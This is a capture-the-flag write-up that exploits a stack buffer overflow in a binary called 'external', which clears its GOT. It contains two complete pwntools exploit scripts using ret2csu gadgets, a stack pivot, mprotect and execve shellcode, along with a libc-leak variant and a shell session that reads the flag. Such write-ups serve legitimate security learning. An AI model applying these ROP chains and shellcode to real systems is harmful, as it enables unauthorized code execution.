External
Recon
As usual, we’ll start off by taking a look at the mitigations enabled in the binary:
$ checksec --file=./external
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 81) Symbols No 0 3 ./external
Cool, there’s no PIE and no canary, that will simplify things a bit in case we find a buffer overflow. Additionally, after opening the file with cutter we see that it’s linked against libc, this may come in handy as well, since the GOT is writeable.
Now, we’ll take an actual look at the disassembly itself, this is the code for main:
: int main (int argc, char **argv, char **envp);
; var void *buf @ rbp-0x50
0x00401224 push rbp
0x00401225 mov rbp, rsp
0x00401228 sub rsp, 0x50
; puts("ROP me\n")
0x0040122c lea rdi, str.ROP_me ; 0x402012 ; const char *s
0x00401233 call puts ; sym.imp.puts ; int puts(const char *s)
; printf("> ")
0x00401238 lea rdi, [0x0040201c] ; const char *format
0x0040123f mov eax, 0
0x00401244 call printf ; sym.imp.printf ; int printf(const char *format)
; read(0, buf, 150)
0x00401249 lea rax, [buf]
0x0040124d mov edx, 0xf0 ; 240 ; size_t nbyte
0x00401252 mov rsi, rax ; void *buf
0x00401255 mov edi, 0 ; int fildes
0x0040125a call read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
; clear_got()
0x0040125f mov eax, 0
0x00401264 call clear_got ; sym.clear_got
; return 0
0x00401269 mov eax, 0
0x0040126e leave
0x0040126f ret
; comments added for clarity
It seems simple enough, it will print a pretty suggestive message (namely, “ROP me\n> “), read from stdin into a buffer on the stack, and then call clear_got. clear_got does exactly what one would expect, it memsets the whole GOT to 0 (more on this later). If we look at the buffer in which our answer will be stored, we can see it begins at address rbp-0x50 but it will read 0xf0 bytes into that buffer, resulting in a buffer overflow and giving us control over both the rip and rbp after the function returns (remember that leave; ret will move rbp to rsp and pop both rbp and rip from the stack).
So far we can overflow the buffer to overwrite the rip stored in the stack, and make main return to whatever address we want. Recall that PIE is not enabled, this means that the binary will be loaded into the same virtual memory address every time the program is executed. And if the binary is always loaded into the same address, then every address within the binary will remain constant across different executions, and will be the same on remote as well. What all of this means is that we can just hard-code addresses into the payload, since they’re guaranteed to be the same on remote (this only applies to addresses within the binary, not to stack addresses and so on). This will be a huge benefit when we start working on our ROP chain.
While I’m at it, here’s a quick remainder on ROP (Return Oriented Programming). Basically, it works by changing the return address of a given function (in our case,
main). We’ll makemainreturn to an un-intended address, where there’s some code that’s of interest to us. The program will continue to execute that code until it hits anotherret, at which point it will return to whatever address is found on the top of the stack. If at the time of sending the payload we get the math right, we can make that secondretjump to another portion of code that’s of interest to us, and so on. We’re only limited by the amount of bytes we’re able to write during the firstread(we can write0xf0bytes, but the first0x50will be ignored becase they reside inside the stack frame formain, that leaves us with0x40bytes for our exploit), and by the availability of ‘interesting’ portions of code that end with aretinstruction.
At this point it looks like all of this will be pretty easy, right? There’s only one problem, the GOT has been zero-ed out. Why is this important? Well, the GOT (Global Offset Table) hold the address for every libc function our binary could possibly want. When we make a call to a libc function, the program will lookup the address of that function in the GOT, and then jump to it. This is what a call to printf does, as an example:
: int printf (const char *format);
0x00401050 jmp qword [reloc.printf] ; 0x404028
0x00401056 push 2 ; 2
0x0040105b jmp section..plt
As you can see, the first thing printf does is jump to whatever address is stored in 0x404028, that’s the entry for printf in the GOT. When the binary first loads, that address will be filled with the qword 0x401056, so jumping to reloc.printf will do nothing but going to the next instruction. When that happens, the dynamic linker will be called, and it will fill the GOT with the correct address for printf. After that, reloc.printf will point to the actual code for printf, which means any subsequent calls will be resolved much faster.
Exploitation
Now let’s move on to the actual exploit.
As you can probably imagine, in order to bypass the fact that the GOT has been erased, we could jump directly to 0x401056 and have the GOT entry for printf re-populated. We could do that for every libc function, and then go from there. That’s entirely doable and it was, in fact, our first approach. We constructed a ROP chain that would call all of the libc functions in the GOT. This would re-populate the GOT, and give us the possibility of using libc functions again. Once this was done, we would call printf with the right arguments in order to leak addresses from the libc and calculate the address of system. Finally, would have everything we needed to call system("/bin/sh").
And it worked… locally. For some unkown reason this exploit worked like a charm on our local hosts, but not on remote. After some debugging we found that calling memset was bringing up trouble (maybe because we couldn’t control the third argument passed on to it, so it would try to memset too many bytes?).
For a more in-depth explaination on how to leak libc addresses, and how that helps to identify what libc version is being used on remote check out the write-up on
The Pwn Innfrom this same CTF, in which we dive into a lot more detail on how it works. Since this was not the way we ended up solving the challenge, we won’t delve into too much detail on it right now (though the code we tried can be found at the end of this write-up).
At last, we decided to go down a different path, we’ll try to invoke mprotect somehow, and get the stack to be executable. At that point we can open up a shell with a little bit of shellcode, no libc involved. There are only two problems: 1) we don’t know where the stack is located, 2) we lack gadgets.
Quick note for those un-familiar with ROP. Remember how I talked about using ‘interesting’ bits of code ending in a
retinstruction before? It turns out those pieces of code are called ‘gadgets’.
Let’s quickly address each of these issues:
Finding gadgets
As it turns out, we’re surprisingly low on gadgets. We need at the very least five things: a way to control rax, rdi, rsi and rdx, plus a syscall instruction. Why? Well, if we want to make a mprotect syscall we’ll want to control all three parameters passed on to it (these are stored in rdi, rsi and rdx respectively), the syscall number is stored in rax and the syscall is made with the syscall instruction. We’re asking for a lot of things here, but the only useful gadgets we’ve managed to find are:
$ ROPgadget --binary ./external 1 ⨯
Gadgets information
============================================================
0x0000000000401269 : mov eax, 0 ; leave ; ret
; ...
0x000000000040127d : mov eax, 1 ; syscall
; ...
0x00000000004012f3 : pop rdi ; ret
0x00000000004012f1 : pop rsi ; pop r15 ; ret
; ...
0x000000000040101a : ret
; ...
0x0000000000401277 : syscall
Unique gadgets found: 106
And of course we can also use some parts of the actual disassembly as well.
Well, we can control rdi, rsi, invoke syscall with rax equal to 1 or 0, and not a whole lot more. But if we look closely at the code we can find something useful:
: __libc_csu_init (int64_t arg1, int64_t arg2, int64_t arg3);
; arg int64_t arg1 @ rdi
; arg int64_t arg2 @ rsi
; arg int64_t arg3 @ rdx
; ...
0x004012d0 mov rdx, r14
0x004012d3 mov rsi, r13
0x004012d6 mov edi, r12d
0x004012d9 call qword [r15 + rbx*8]
0x004012dd add rbx, 1
0x004012e1 cmp rbp, rbx
0x004012e4 jne 0x4012d0
0x004012e6 add rsp, 8
0x004012ea pop rbx
0x004012eb pop rbp
0x004012ec pop r12
0x004012ee pop r13
0x004012f0 pop r14
0x004012f2 pop r15
0x004012f4 ret
Isn’t this a bit interesting? Say we jumped to address 0x4012ea, then rbx, rbp and r12 through r15 will be popped from the stack, then a ret will be executed. What if that ret jumped to address 0x4012d0? Then all those values previously popped from the stack would be inserted into rdx, rsi and edi. That’s just what we want!
Actually, using this approach we can write an arbitrary value into
edi(the lower 32 bits ofrdi), but we don’t need to worry that much about this, because all of the addresses we’re interested in fit in one dword, plus writing toedizeros out the higher 32 bits ofrdi.
There’s a catch though, r15 + rbx * 8 will need to point to an address where another address is stored. That second address should point to some code that won’t modify rdx (ideally none of the previous registers, but rdx is the only one we really can’t afford to lose), and that will eventually lead to a ret. Also, since the instruction at 0x4012d9 is a call, it will push the rip into the stack, so our ROP will not continue until the ret at 0x4012f4 is executed (and, for that to work rbp should be equal to rbx minus 1).
This isn’t so bad as it may seem at first glance, though. If we load 0x403e38 into r15 and 0x0 into rbx then that call at 0x4012d9 will take us to the following bit of code:
: _fini ();
0x00401308 endbr64 ; [14] -r-x section size 13 named .fini
0x0040130c sub rsp, 8
0x00401310 add rsp, 8
0x00401314 ret
That’s because, for whatever reason, the qword stored at 0x403e38 is equal to 0x401308 (don’t ask me where I got that from, hours of staring at hexdump’s output were involved). Since rbp should be equal to rbx minus 1, and rbx needs to be 0x0, we don’t have a choice but to load 0x1 into rbp.
This is getting a little convoluted, I hope I didn’t lose you so far. To summarize, the only takeaway here is: rdx is ours, but changing its value will cost us a lot of space in our ROP chain. This isn’t really a problem though, since we can just use this gigantic ROP chain to fire a second read syscall. One might (fairly) argue: Why make such an annoying ROP chain just to invoke read again? Well, now that we control the arguments passed on to read, we can make the second read call read an enormous amount of bytes, and store the result in a known address. As we’ll see, this will come in handy later on.
Where did those two functions
_finiand__libc_csu_initcome from? Well, it turns out these are pieces of code that the compiler automatically attaches to our executable every time we compile a program (at least gcc does it on GNU/Linux). Using these gadgets is known asret2csu, you can read more about it and how it’s used on this paper.
Finding the stack
I’ll say this upfront: we don’t need to find the stack. After the read discussed in the previous section is executed, we can use the region of code used for storing the results as a fake stack. It’ll work like this:
- Use the ROP chain discussed previously to read as many bytes as we want into address
X(we need to make sure this address is writeable first) - Make
rsppoint to addressX - Continue executing our ROP from there
That’s it! Now we’ve got a larger buffer that we can use to invoke mprotect, since our ‘stack’ is now at a known address we can make that region executable, and finally jump to our shellcode (which should be stored there as well).
Invoking mprotect
Quick sidenote on invoking mprotect: we’ve no direct control over rax, to get over this we can use our ROP chain to invoke a write syscall.
Recall that we now control
rdi,rsiandrdx, and that there’s a gadget that doesmov rax, 1; syscall; ret(1is the syscall number forwrite), so invoking syscall with the right arguments should be no problem.
We can tell the kernel to write 0x0a bytes (the syscall number for mprotect) from any readable address into the standard output, as a result the kernel will store the number of writen bytes (0x0a) into rax. As you can see, it just takes a little bit of work, but that way we can control rax as well!
Putting it all together
All of this might feel a bit overwhelming because of all the details involved, but try to keep in mind the core idea:
- We have a way of invoking a read syscall controlling all of it’s arguments, so we read an awful amount of bytes into some address
X. - We make
rsppoint to that address (using gadgets likeleave; ret, since we have control overrbp). - Now the ‘stack’ will be located at a known address and we have total control over it’s contents. So we use this fake stack to call
write(1, [whatever], 0x0a)using the same mechanism as used in step 1. Effectively fillingraxwith0x0a. - Now that
raxis0x0awe again use the same mechanism as the one in step 1 to invoke a syscall that will make the whole memory page atXexecutable. - We jump to our shellcode, which will be stored at
X + [someOffset]
The resulting exploit will look something like this (using Python and pwntools):
from pwn import *
context.update(os='linux', arch='amd64')
p = remote('161.97.176.150', 9999)
# First payload, this will just trigger read(0, 0x404000, 0x1000)
# Why 0x404000? Well, that's a read-write memory section, that means the whole page
# is read-write, so we've got 0x1000 bytes to play around with at that address
payload0 = b''
payload0 += 0x58 * b'A' # padding
payload0 += p64(0x4012ea) # address of gadget 1 (pop rbx; pop ... ; ret)
payload0 += p64(0x0) # rbx
payload0 += p64(0x1) # rbp
payload0 += p64(0x0) # r12
payload0 += p64(0x404000) # r13
payload0 += p64(0x1000) # r14
payload0 += p64(0x403e38) # r15
payload0 += p64(0x4012d0) # address of gadget 2 (mov rdx, r14; mov ...; call [r15 + rbx * 8])
# Since after the call instruction (address 0x4012dd) rbx, rbp,
# r12-r15 will be popped again, we need to add some padding
payload0 += (7 * 0x8) * b'A' # padding
payload0 += p64(0x401283) # address of syscall ; ret
payload0 += p64(0x4012ed) # address of gadget 3 (pop rsp; pop ... x3 ; ret)
# Address of our new 'stack' (will be poped into rsp)
payload0 += p64(0x404000)
p.info('Sending ' + hex(len(payload0)) + ' bytes')
p.recvuntil(b'> ')
p.send(payload0)
# This payload will be read into our fake stack, we need to remember that because
# of gadget 3 from payload 1 (pop rsp; 3 x pop ; ret) we need to insert 0x18 bytes of
# padding at the beginning
payload1 = b''
payload1 += b'A' * 0x18 # padding
# Let's trigger write(1, 0x404000, 0xa) so we can set rax to 0xa
# Same concept as before, fill rdi, rsi, rdx with the desired values
payload1 += p64(0x4012ea) # gadget 1
payload1 += p64(0x0) # rbx
payload1 += p64(0x1) # rbp
payload1 += p64(0x1) # r12
payload1 += p64(0x404000) # r13
payload1 += p64(0xa) # r14
payload1 += p64(0x403e38) # r15
payload1 += p64(0x4012d0) # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x40127c) # mov rax, 1; syscall ; ret
# Now that rax is set to 0x0a, let's trigger mprotect(0x404000, 0x1000, 0x7)
# Again, same concept, fill rdi, rsi and rdx with the desired values
payload1 += p64(0x4012ea) # gadget 1
payload1 += p64(0x0) # rbx
payload1 += p64(0x1) # rbp
payload1 += p64(0x404000) # r12
payload1 += p64(0x1000) # r13
payload1 += p64(0x7) # r14
payload1 += p64(0x403e38) # r15
payload1 += p64(0x4012d0) # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x401283) # syscall ; ret
# Address of our shellcode, our payload begins at address 0x404000, so we should add
# the current length of the payload plus 0x8, to account for this value
payload1 += p64(0x404000 + len(payload1) + 8)
# Basic shellcode that triggers execve('/bin/sh', 0, 0), since the 'read' syscall
# is used to read the shellcode we don't need to worry about special characters
# null characters, or anything of the like
shellcode = b'\xb8\x3b\x00\x00\x00\x48\x8d\x3d\x08\x00\x00\x00\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68\x00'
payload1 += shellcode
p.send(payload1)
p.info('Sending ' + hex(len(payload1)) + ' bytes')
# Recieve those 0xa bytes we've written so that the output doesn't get poluted
p.recv(0xa)
# Profit!
p.interactive()
The exploit in action:
$ python exploit.py
[+] Opening connection to 161.97.176.150 on port 9999: Done
[*] Sending 0xe8 bytes
[*] Sending 0x13c bytes
[*] Switching to interactive mode
$ ls
bin
dev
etc
external
flag.txt
lib
lib64
usr
$ cat flag.txt
flag{0h_nO_My_G0t!!!!1111!1!}
$
Honorable mentions
For those of you who are curious, here’s the initial attempt that we made which I talked about earlier (populating the GOT and calling system):
from pwn import *
import sys
context(os='linux', arch='amd64')
binary = ELF('./external')
# This is the libc in use on remote. We found out the version
# by leaking addresses and looking at the offsets between them
libc = ELF('./libc-2.28.so')
off_printf_got = binary.got['printf']
off_system_libc = libc.symbols['system']
off_printf_libc = libc.symbols['printf']
off_binsh_libc = next(libc.search("/bin/sh"))
exploit = b"\x41" * 0x58 # buffer + rbp
exploit += p64(0x4012f3) # pop rdi ; ret
exploit += p64(0x402012) # rdi = &"Ropme"
exploit += p64(0x401056) # printf call
exploit += p64(0x4012f3) # pop rdi ; ret
exploit += p64(off_printf_got) # rdi = printf@got
exploit += p64(0x401036) # puts call
exploit += p64(0x4012f3) # pop rdi ; ret
exploit += p64(0x404050) # rdi -> data section
exploit += p64(0x401066) # memset call
exploit += p64(0x401086) # read call
exploit += p64(binary.symbols['main'])
p = remote('161.97.176.150', 9999)
p.recvline()
p.recvuntil(' ')
p.sendline(exploit)
printf_libc_addr = p.recvline()
printf_libc_addr = u64(printf_libc_addr[9:-1]+"\x00\x00")
system = printf_libc_addr - off_printf_libc + off_system_libc
binsh = printf_libc_addr - off_printf_libc + off_binsh_libc
log.info("printf @ {}".format(hex(printf_libc_addr)))
log.info("offset printf @ {}".format(hex(off_printf_libc)))
log.info("offset system @ {}".format(hex(off_system_libc)))
log.info("offset /bin/sh @ {}".format(hex(off_binsh_libc)))
log.info("system @ {}".format(hex(system)))
log.info("/bin/sh @ {}".format(hex(binsh)))
exploit2 = b"\x41" * 0x58 # buffer + rbp
exploit2 += p64(0x4012f3) # pop rdi ; ret
exploit2 += p64(binsh) # rdi -> /bin/sh
exploit2 += p64(system)
p.recvline()
p.recvuntil(' ')
p.sendline(exploit2)
p.interactive()